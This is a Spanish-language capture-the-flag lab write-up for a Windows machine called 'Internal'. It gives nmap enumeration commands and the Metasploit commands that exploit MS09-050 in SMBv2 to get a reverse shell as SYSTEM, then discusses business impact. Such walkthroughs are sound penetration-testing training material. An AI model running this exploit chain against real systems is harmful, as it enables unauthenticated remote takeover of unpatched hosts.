Internal

Detalles
- Sistema Operativo: Windows
- Dificultad: Easy
- IP Address: 192.168.208.40
- Autor: AETH3RON
Resumen
Internal es una máquina Windows susceptible a una vulnerabilidad crítica legacy en el protocolo SMBv2. Enumerando los servicios expuestos, identificamos un fallo específico en cómo el servidor maneja la negociación SMB (MS09-050). Explotar esta vulnerabilidad permite la ejecución remota de código inmediata como NT AUTHORITY\SYSTEM, sin necesidad de credenciales previas ni escalada de privilegios posterior.
Enumeración
Nmap
Comenzamos realizando un escaneo SYN básico para identificar los puertos abiertos.
nmap -Pn -sS -sV -p- 192.168.208.40 -oN nmap-basic

A continuación, realizamos un escaneo dirigido sobre los puertos descubiertos para obtener información más detallada sobre los servicios y versiones del sistema operativo.
nmap -Pn -sS -sC -p53,135,139,445,3389,5357 192.168.208.40 -oN nmap-common

El output muestra puertos Windows legacy, lo que sugiere un sistema operativo antiguo. Para confirmar posibles fallos de seguridad, ejecutamos los scripts de vulnerabilidades de Nmap contra el puerto SMB (445).
nmap -p445 --script vuln 192.168.208.40 -oN nmap-vuln

Acceso Inicial
El escaneo de vulnerabilidades indica que el objetivo es susceptible a MS09-050 (CVE-2009-3103).
Esta vulnerabilidad reside en el driver del protocolo SMBv2 (srv2.sys). Está causada por un error de índice fuera de los límites que ocurre cuando el servidor maneja un paquete SMB2_NEGOTIATE especialmente manipulado. Un atacante puede desencadenar este fallo para corromper la memoria y ejecutar código arbitrario con privilegios de kernel.
Para explotarla, usamos el módulo de Metasploit correspondiente: windows/smb/ms09_050_smb2_negotiate_func_index.
use windows/smb/ms09_050_smb2_negotiate_func_index
set RHOSTS 192.168.208.40
set LHOST tun0
run

El exploit funciona enviando el paquete de negociación malformado. Tras unos segundos, el servidor procesa la petición, activa la vulnerabilidad y nos devuelve una conexión inversa.
Verificamos el acceso spawneando una shell y comprobando el usuario actual.
shell
whoami

Como se confirma, hemos obtenido exitosamente una shell como NT AUTHORITY\SYSTEM, dándonos control completo sobre la máquina. No se requiere escalada de privilegios adicional.
Impacto de Negocio
Esta máquina destaca el riesgo catastrófico de mantener sistemas Windows legacy sin parches de seguridad actuales. La vulnerabilidad MS09-050 en SMBv2 permite la ejecución remota de código como SYSTEM sin autenticación y sin interacción del usuario. En entornos empresariales donde los sistemas legacy persisten por requisitos de compatibilidad, un único host sin parchear puede servir como punto de entrada para despliegue de ransomware, movimiento lateral por la red o compromiso total del dominio. La ausencia de cualquier barrera de autenticación hace esta vulnerabilidad particularmente peligrosa en arquitecturas de red planas.
Referencias
- MS09-050 (CVE-2009-3103):
- Microsoft Security Bulletin MS09-050:
Nuevos archivos recuperados, directos a tu bandeja. Sin ruido.